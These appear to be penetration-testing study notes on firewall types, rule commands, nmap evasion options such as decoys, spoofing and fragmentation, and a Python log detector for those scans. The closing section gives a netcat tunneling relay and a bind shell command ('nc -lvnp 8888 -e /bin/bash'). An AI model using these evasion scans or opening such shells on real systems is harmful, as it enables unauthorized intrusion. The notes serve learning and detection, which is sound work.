Firewall Handling
Types
- Packet filtering
- Circuit level gateway
- Stateful inspection
- Proxy
- Next generation firewall
- Cloud firewall and FWaaS
Rules
Windows
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
CentOS
firewall-cmd --zone=public --add-port=57869/tcp
Circumvention
- IP/MAC/Port spoofing
- Fragmentation, MTU, data length
- Header modification
nmap
Spoofing
- Decoy, -D: mix the real IP address in with random addresses. Every port is probed from each of these addresses, so the target sees the whole set.
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
- Proxy
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
- Spoofed MAC
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
- Spoofed IP
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
- Port number: select a source port that is whitelisted. Frequently this is 53, 80 or 443.
sudo nmap -F --source-port 443 $TARGET_IP
- Fragmentation: after the Ethernet header and the 20-byte IP header, split the probe into 8-byte fragments via -f, or 16-byte fragments via -ff.
sudo nmap -Pn -F -f $TARGET_IP
- MTU: works like fragmentation, -f is equivalent to --mtu 8
sudo nmap -Pn -F --mtu 8 $TARGET_IP
- Data length: after the Ethernet and IP headers, append random padding of the given number of bytes to each probe.
sudo nmap -Pn -F --data-length 64 $TARGET_IP
Header Fields
- TTL
sudo nmap -Pn -F --ttl 64 $TARGET_IP
- IP options, --ip-options, given as a hex string or one of the shortcuts:
  - Route, R
  - Timestamp, T
  - Route + Timestamp, U
  - Loose source routing, L $IP $IP $IP
  - Strict source routing, S $IP $IP $IP
- Checksum: craft a bad checksum via --badsum to check how the filter handles checksum errors
sudo nmap -Pn -F --badsum $TARGET_IP
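Detection-side counterpart to the decoy, --source-port and -f techniques above, added here as an example that is not part of the original notes: it parses constructed netfilter-style DROP log lines (the line format, addresses and thresholds are assumptions) and flags sources that probed many ports, decoy clusters that scanned an identical port set, fragmented probes, and SYNs arriving from whitelisted source ports.

```python
import re
from collections import defaultdict

# Source ports a filter is often told to trust (the whitelisted ports in the notes above).
TRUSTED_SPT = {53, 80, 443}
FIELD = re.compile(r"(\w+)=(\S*)")          # KEY=VALUE pairs of a netfilter LOG line
FRAGMENT = re.compile(r"\bMF\b|FRAG:\d+")  # more-fragments flag or non-zero fragment offset

def parse(line):
    """Pull the fields a scan detector needs out of one kernel log line."""
    f = dict(FIELD.findall(line))
    return {"src": f.get("SRC"), "spt": int(f.get("SPT", 0)), "dpt": int(f.get("DPT", 0)),
            "frag": bool(FRAGMENT.search(line)), "syn": " SYN " in line}

def analyse(lines, scan_threshold=5):
    """Group dropped probes per source; flag scanners, decoy clusters, fragments, trusted SPTs."""
    ports_by_src, fragmented, trusted_spt_syn = defaultdict(set), defaultdict(int), defaultdict(int)
    for line in lines:
        p = parse(line)
        if not p["src"]:
            continue
        ports_by_src[p["src"]].add(p["dpt"])
        if p["frag"]:
            fragmented[p["src"]] += 1
        if p["syn"] and p["spt"] in TRUSTED_SPT:      # --source-port style evasion
            trusted_spt_syn[p["src"]] += 1
    scanners = {s for s, ports in ports_by_src.items() if len(ports) >= scan_threshold}
    # nmap -D sends every probe from every decoy, so decoys share an identical port set.
    clusters = defaultdict(set)
    for s in scanners:
        clusters[frozenset(ports_by_src[s])].add(s)
    decoy_groups = [sorted(srcs) for srcs in clusters.values() if len(srcs) > 1]
    return {"scanners": scanners, "decoy_groups": decoy_groups,
            "fragmented": dict(fragmented), "trusted_spt_syn": dict(trusted_spt_syn)}

def _log(src, dpt, spt=443, flags=""):
    # Constructed sample line approximating the netfilter LOG target format (assumption).
    return (f"Mar  1 10:00:01 fw kernel: FW-DROP: IN=eth0 OUT= SRC={src} DST=10.0.0.10 "
            f"LEN=44 TOS=0x00 PREC=0x00 TTL=48 ID=1337 {flags}PROTO=TCP SPT={spt} DPT={dpt} "
            f"WINDOW=1024 RES=0x00 SYN URGP=0")

DECOYS = ("10.0.0.5", "10.0.0.23", "10.0.0.42")   # constructed: one real scanner plus two decoys
PORTS = (22, 80, 443, 8080, 3389)
SAMPLE_LOG = [_log(src, dpt, flags="MF " if dpt == 3389 else "") for src in DECOYS for dpt in PORTS]
SAMPLE_LOG.append(_log("10.0.0.99", 22, spt=51000))  # ordinary single dropped connection

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Sources inside one decoy group cannot be told apart from the log alone, which is why blocking on source address during such a scan punishes the decoys as much as the scanner.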
After the FW
- Hopping: listen via netcat on the allowed port to catch the connection
- Tunneling: once past the firewall, open a relay on an allowed port that forwards to the closed port (ncat syntax)
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
- Non-standard ports: open a bind shell via
nc -lvnp 8888 -e /bin/bash
and connect